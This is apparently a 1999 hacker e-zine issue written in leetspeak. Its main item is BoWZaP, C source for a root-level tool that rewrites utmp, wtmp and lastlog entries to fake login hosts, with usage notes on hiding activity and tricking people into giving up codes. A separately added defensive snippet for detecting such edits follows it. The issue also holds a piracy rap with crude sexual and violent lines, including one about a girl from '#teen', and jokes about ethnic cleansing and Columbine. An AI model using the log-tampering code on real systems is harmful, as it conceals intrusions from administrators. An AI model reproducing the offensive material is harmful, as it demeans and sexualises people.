BoW BoW BoW Bo W BoW BoW BoW BoW Bo* + ------------------------------ + *BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW Bo* by: The k0d3sl4y3r *BoW BoW BoW BoW BoW Bo ============================================================================== w0rd!@# smAk1tUp n1gl3tz, phr3$h w4r3z phr0m th3 K0D3SL4Y3R of BoW. 
0nc3 4g41n BoW 1z th3r3 k0ur13r1ng th3 l8Zt & gr34t3zt w4r3z t0 0ur f41thpHul
ph34r1ng r34d3r$h1p f1rZt!@$#

---kUt-h3r3---kUt-h3r3---kl1p-kl1p---z3r0-dAy---smAk-smAk---kUt-h3r3-
/*
 * ____ __ __ __ __
 * /\ _`\ /\ \ __/\ \ /\ \\ \
 * \ \ \_\ \ ___\ \ \/\ \ \ \ ____ \ \ \\ \ _____
 * \ \ _ <' / __`\ \ \ \ \ \ \/\_ ,`\\ \ \\ \_ /\ '__`\
 * \ \ \_\ \/\ \_\ \ \ \_/ \_\ \/_/ /_\ \__ ,__\ \ \_\ \
 * \ \____/\ \____/\ `\___x___/ /\____\\/_/\_\_/\ \ ,__/
 * \/___/ \/___/ '\/__//__/ \/____/ \/_/ \ \ \/
 * Ph34r BoW!@!#!@ www.velkro.net \ \_\
 * \/_/
 *
 * BoWZaP 1.0 - k-sp1ff h4qR tYp3 l0g ed1t0r ph0r 4.4BSD/SunOS4/Linux
 *
 * say u r l0gg3d 1nt0 cert.org as 'sp4f' on ttyp2 & want t0 b
 * m1sch13v0us.. u w0uld th3n d0:
 *
 * [sp4f@cert][~] % su -
 * Password: b0w-t13z
 * # ./BoWZaP sp4f justin.kalinas.home.machine ttyp2
 *
 * 0r t0 ch4ng3 4ll 1nst4nc3z 0f sp4f jU$t l34v3 0ut th3 ttY argUm3nt..
 *
 * u k4n alz0 uz3 1t t0 1mpr3$$ uR fr13ndz & tr1ck th3m 1nt0 g1v1ng
 * u k0d3z .. i.e. m4k3 1t l00k l1k3 uR 0n fr0m zang.com or s0m3th1ng,
 * th3n ppl w1ll l1k3 t0tally ph34r u & stUph.
 *
 * k0mp1l3 w/ [g]cc -O[2] -o BoWZaP BoWZaP.c [-DSUNOS] -s
 *
 * w0rd!@#
 * - K0d3S|aY3r [b4dd3r & k-r4dd3r th4n ev3r 1n '99]
 */

#include
#include
#include
#include
#include

#ifdef SUNOS
#include
#define _PATH_UTMP "/etc/utmp"
#define _PATH_WTMP "/var/adm/wtmp"
#define _PATH_LASTLOG "/var/adm/lastlog"
#endif

int main(ac, av)
int ac;
char **av;
{
    int fd;
    struct utmp ut;
    struct lastlog ll;
    struct passwd *pw;

    if(ac<3) {
        fprintf(stderr,"Usage: %s user fakehost [tty]\n",av[0]);
        exit(1);
    }

    if((pw=getpwnam(av[1])) < 1) {
        fprintf(stderr,"Not in /etc/passwd.\n");
        exit(1);
    }

    if((fd=open(_PATH_UTMP,O_RDWR)) < 0) {
        fprintf(stderr,"Couldn't open %s\n",_PATH_UTMP);
        exit(1);
    }

    while(read(fd,&ut,sizeof(ut)) > 0) {
        if(!strncmp(ut.ut_name,av[1],strlen(av[1]))) {
            if(!av[3] || (av[3] && !strncmp(ut.ut_line,av[3],strlen(av[3])))) {
                memcpy(ut.ut_host, av[2], sizeof(ut.ut_host));
                lseek(fd, (int)-sizeof(ut), SEEK_CUR);
                write(fd, &ut, sizeof(ut));
            }
        }
    }
    close(fd);
    printf("%s successfully altered.\n", _PATH_UTMP);

    if((fd=open(_PATH_WTMP,O_RDWR)) < 0) {
        fprintf(stderr,"Couldn't open %s\n",_PATH_WTMP);
        exit(1);
    }

    lseek(fd,(long) -(sizeof(ut)), SEEK_END);
    while(read(fd,&ut,sizeof(ut)) > 0) {
        if(!strncmp(ut.ut_name,av[1],strlen(av[1]))) {
            if(!av[3] || (av[3] && !strncmp(ut.ut_line,av[3],strlen(av[3])))) {
                memcpy(ut.ut_host, av[2], sizeof(ut.ut_host));
                lseek(fd, (int)-sizeof(ut), SEEK_CUR);
                write(fd, &ut, sizeof(ut));
                break;
            }
        }
        lseek(fd, (long) -(sizeof(ut) * 2), SEEK_CUR);
    }
    close(fd);
    printf("%s successfully altered.\n",_PATH_WTMP);

    if((fd=open(_PATH_LASTLOG,O_RDWR)) < 0) {
        fprintf(stderr,"Couldn't open %s\n",_PATH_LASTLOG);
        exit(1);
    }

    lseek(fd, (long)pw->pw_uid * sizeof(struct lastlog), 0);
    memcpy(ll.ll_host,av[2],sizeof(ll.ll_host));
    if(av[3]) {
        memcpy(ll.ll_line,av[3],sizeof(ll.ll_line));
    }
    write(fd, (char *)&ll, sizeof(ll));
    close(fd);
    printf("%s successfully altered.\n", _PATH_LASTLOG);
}
---kUt-h3r3---kUt-h3r3---kl1p-kl1p---z3r0-dAy---smAk-smAk---kUt-h3r3-
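
The memcpy(ut.ut_host, av[2], sizeof(ut.ut_host)) calls in the listing above copy the full width of the host field however short the replacement hostname is, so the rewritten record also picks up whatever followed the argument in memory. The C below is an added example for log reviewers (not part of the zine or of BoWZaP) that checks a fixed-width field for that residue; the record layout, the 16-byte width, the sample hostnames and the premise that legitimate writers zero-fill the field with strncpy() are all assumptions.

```c
#include <stddef.h>
#include <string.h>

#define HOSTSZ 16   /* assumed host field width (4.4BSD-style) */

/* Simplified login record; hypothetical layout, not a real utmp.h. */
struct rec { char name[8], line[8], host[HOSTSZ]; };

/* Count non-zero bytes after the first NUL of a fixed-width field.
 * strncpy() zero-fills the tail, so a cleanly written field gives 0.
 * A field with no NUL at all is a truncated long name: also 0. */
size_t field_residue(const char *f, size_t n)
{
    const char *nul = memchr(f, '\0', n);
    size_t junk = 0;
    for (const char *p = nul ? nul + 1 : f + n; p < f + n; p++)
        junk += (*p != '\0');
    return junk;
}

/* Build a record the way a strncpy()-based writer would (assumption). */
struct rec make_rec(const char *name, const char *line, const char *host)
{
    struct rec r;
    memset(&r, 0, sizeof r);
    strncpy(r.name, name, sizeof r.name);
    strncpy(r.line, line, sizeof r.line);
    strncpy(r.host, host, sizeof r.host);
    return r;
}

/* Constructed sample: the same record after a full-width memcpy() from an
 * argv-like buffer, which drags the neighbouring strings in with it. */
struct rec make_overwritten(void)
{
    static const char argv_like[32] = "new.example\0ttyp2\0HOME=/root";
    struct rec r = make_rec("sp4f", "ttyp2", "old.example.net");
    memcpy(r.host, argv_like, sizeof r.host);
    return r;
}

/* Number of records in a log whose host field carries residue. */
size_t count_suspect(const struct rec *recs, size_t n)
{
    size_t hits = 0;
    for (size_t i = 0; i < n; i++)
        hits += field_residue(recs[i].host, HOSTSZ) > 0;
    return hits;
}
```

A hit is a lead, not proof: compare the flagged record against a log source the local root account cannot rewrite, such as a remote syslog collector.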
______________________________________________________________________________
12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12
______________________________________________________________________________
BoW BoW BoW BoW BoW Bo*                                *BoW BoW BoW BoW BoW Bo
W BoW BoW BoW BoW Bo* + ------------------------------ + *BoW BoW BoW BoW BoW
BoW BoW BoW BoW BoW Bo|     RHYM1N' AN' K0UR13R1N'     |BoW BoW BoW BoW BoW Bo
W BoW BoW BoW BoW Bo* + ------------------------------ + *BoW BoW BoW BoW BoW
BoW BoW BoW BoW BoW Bo*          by: pbx p4t           *BoW BoW BoW BoW BoW Bo
==============================================================================

rhYm1n an' k0ur13r1n
(sUng t0 th3 tUn3 0f 'rhymin and stealin' by the beastie boys)

b3kUz.. k0ur13r1n' 0-dAy 1z wh4t w3'r3 4ll ab0Ut!@#
1m g0nn4 h4ck y0Ur b04rd & tUrn 1t 0n 0ut!
n0 dUm l4ym0r w1t 0ldw4r3z 0r 4 n4rq-1nf0rm3r
kUz 1m el8 g3tt1n el8r, h0t w4r3z g3tt1n w4rm3r
t3rr0r1z1n sUck3rz 0n th3 IRC
and 1ph u g0t b33f u'll g3t c4pp3d 1n th3 kn33z
w3 g0t s1xt33n w4r3z 0n an 0wn3d m4n'z ch3zt
and eYe rm'd th0z3 sUck3rz & 1'll rm th3 r3zt!
m0zt z3r0-d4y k0ur13r, 1 g0t th4t f33l1n
kUz 1 4m m0zt 1ll, & 1m rhYm1n & k0ur13r1ng!
sn4tch1n y0' sp00lz, v1ck1n p13c3z 0f e1Ght,
1 g0t y0' OE, & uR LEN, & ur l1c3nz3 pl4t3
w3 g0t w3nch3z 0n y4h00 ch4t & 1rc h0z w/ t1tt13z
cYb3rs3x1n' 4ll g1rl13z, fr0m c1tY t0 c1ty!@$#
1 f0r 4ll & 4ll f0r 0n3
t4k1n 0ut lAym0rz w1t 4 b1g sh0tgUn
4ll f0r 0n3 & 0n3 f0r 4ll
kUz th3 Br0th3rh00d of W4r3z h4z g0n3 AWOL!@
sl1ng1n sUmm3r g4m3z & pUll1n ur k01lz,
b1g b1t1n sUck3rz g3tt1n k1ck3d fr0m #warez
w3 g0t m41d3nz & w3nch3z m4n th3y'r3 0n th3 4c3
er1kb 1z g0nn4 d13 wh3n w3 br34k h1z f4c3!
U4EA & th3 f0rtY k0ur13rz
rm'1n & cr4ck1n & k0ur13r1n & st34l1n
r0bb1n & c0nf1n, bUzt1n tw0 1n th3 h4rd dr1v3
1m wh33l1n 1m d34l1n 1m dr1nk1n n0t th1nk1n
n3v3r sl33p, n3v3r sh0w3r kUz 1m alw4yz dl`1n
y0-h0-h0 & a 40 0f j0lt c0l4,
f0n3s3x1n a g1rl fr0m #teen n4m3d l0l4!
wAr3z ch4s1n (sc0tt?!@) fr33 b4z1n, k1ll1n ev3ry v1ll4g3
w3 h4q & k0ur13r & rhYm3, & p1ll4g3!
1'v3 b33n dr1nk1n my c0k3 n0t p3pz1 kUz 1t'z g4y
1 f0Ught th3 l4w & eY3 g0t mY p3nt1Um t4k3n aw4y
MOD 1z w34k, L0D 1z 0ff th3 b4ll,
kUz 1 pUll 0ut th3 dr0pst4t & eYe rM th3m 4ll!@$
mY h4rd-dr1v3 1z l04d3d, eYe h4qd - b3tty kr0ck3r
d3l1v3r c0mm4nd3r k33n d0wn t0 dAvy j0n3z' l0ck3r!@$
rhYm1n & k0ur13r1n 1n 4 sl33pl3zz st4t3,
& 1ll b k0ur13r1n my w4r3z 4ll th3 w4y t0 pr1z0n'z g4t3

 PBX PAT PBX PAT PBX  |
P ._______________. P -=PBX P4T - BoW - PBX P4T - BoW - PH34R!
H |pee   -:-   bee| H |
E \ +-----------+ / E -=In ThE ZoNe WiTH d4h M4D M4D MeTrOfOnE
A : |pbx:pbx:pbx| : A |
R : |pat:pat:pat| : R -=K4LL1N H0mE w1TH m4h KaY-R4d ToUcHtOnE
B / +-----------+ \ B |
O |eks   -:-   pat| O -=Iz NoT A Ch0R3 WhEn Y3r A #PhReAk HoRe
W `~~~~~~~~~~~~~~~' W |
 PBX PAT PBX PAT PBX  -=K0D3Z I G0T M0R3 TH4N TH3 M1GHTY TH0R!

______________________________________________________________________________
13 13 13 13 13 13 13 13 13 13 13 13 13 13 13 13 13 13 13 13 13 13 13 13 13 13
______________________________________________________________________________
BoW BoW BoW BoW BoW Bo*                                *BoW BoW BoW BoW BoW Bo
W BoW BoW BoW BoW Bo* + ------------------------------ + *BoW BoW BoW BoW BoW
BoW BoW BoW BoW BoW Bo|  ThE OFFiCiAL BoW SiTE LiST!!  |BoW BoW BoW BoW BoW Bo
W BoW BoW BoW BoW Bo* + ------------------------------ + *BoW BoW BoW BoW BoW
BoW BoW BoW BoW BoW Bo*         by: BoW STaFF          *BoW BoW BoW BoW BoW Bo
==============================================================================

Status      Name                  Baud      Login/NUP      Number
------      ----                  ----      ---------      ------
WORLD HQ    THe GeNeRaL Le3       28.8      DoH            [WaY]-TO-ELiTE
WWW HQ      C.N.R.T.              blinding  phear          www.velkro.net
CAN HQ      WaReZz Mah WaReZ      28.8      SMaKMeW/0DaY   [T0o]-PRi-VaTE
UK HQ       ThEr3z Mah WaReZ      14.4      phate/haggis   +44-T00-KRAD4U
US HQ       K4T SKR4TCH F3V3R     300BPS    felismortis    [KIL]-All-K4tZ
KOSOVO HQ   Ethn1c Dry Cl34n3rz   DOWN      dieslobo       (G0T)-BL0-WNUP
MANILA HQ   El1t3 na El1t3        2400      putanginamo    +63-SK4N-4-1T!
TEXAS HQ    T0uch3d By 4n Uncl3   4800      FaMiLyTiES     [J00]-PHEAR-US
JAPAN HQ    H4ppY LuCkY WAr3Z     110       MrSpArKlE      +81-MESO-L33T1
AUSI HQ     K0D3Z 0n th3 B4rb13   666       sun0sr0x       [S00]-VRY-31337
DENVER HQ   iN Th3 Tr3NchEZz      16.8      kleb0ld1       [H4V]-PRO-P4N3
FTP DISTRO  ftp.etext.org         fazt      anonymous      /Zines/BoW/
CHINA HQ    -K00D Be j0o-         0         -none-         911
RUSIAN HQ   -k00D b3 Yo0-         0         -none-         911

iF YoU WaNT To BE a BoW KoURiER SiTE, SiMPLY eMAIL YoUR BBS aDD To
vkw@velkro.net (th4nkz To ThE VeLkR0 KoD3 W4rR1oR Ph0R T4kiNg K4R3 oF THiS)
oN ThE iNFORmATiON-S00PaH-Hi-WaY - MaKE SuRE To iNKlUDE iN YoUR aDD THaT YoU
ARe aN "oFFiCiAL BoW KoURiER SiTE" (CaSE SeNSiTiVE).

REMEMBER: PHONE PHRAUD IS PHUN PHRAUD.

+---------------------------------------------------------------------------+
|          - KoURiERZ FeR CHRiST (KFC) / THe APoSTLES oF APoGeE -           |
| WHQ ....... THE SHAO-LINE TOWERING CASTLE OF CODES ..........406-FUQ-OFFF |
| EURO-HQ ... THe K0d3 AB0dE...................................307-K-SPIFFY |
| US-HQ ..... TEMPLE OF ZeR0-DAY ..............................303-2EL-EET! |
| CAN-HQ .... TREMBLING SANCTUARY OF SoFTWaRE .................505-NOT-4YOU |
| AUSSI-HQ .. aLTER OF WaREZ ..................................913-NO1-ALWD |
| CHINA-HQ .. HeAVENLy K0D3Z ..................................816-NO-K0D3Z |
| RUSSIAN-HQ. M0T3l 31337......................................405-PRi-VATE |
| KANSAS-HQ.. WE'RE STiLL iN KANSAS T0T0 ......................903-FUQ-Yo00 |
+---------------------------------------------------------------------------+

313373133731337313373133731337313373133731337313373133731337313373133731337313
END 0F TR4NZM1ZZi0N...
PHEARBoWPHEARBoWPHEARBoWPHEARBoWPHEARBoWPHEARBoWPHEARBoWPHEARBoWPHEARBoWPHEARB

NO CARRIER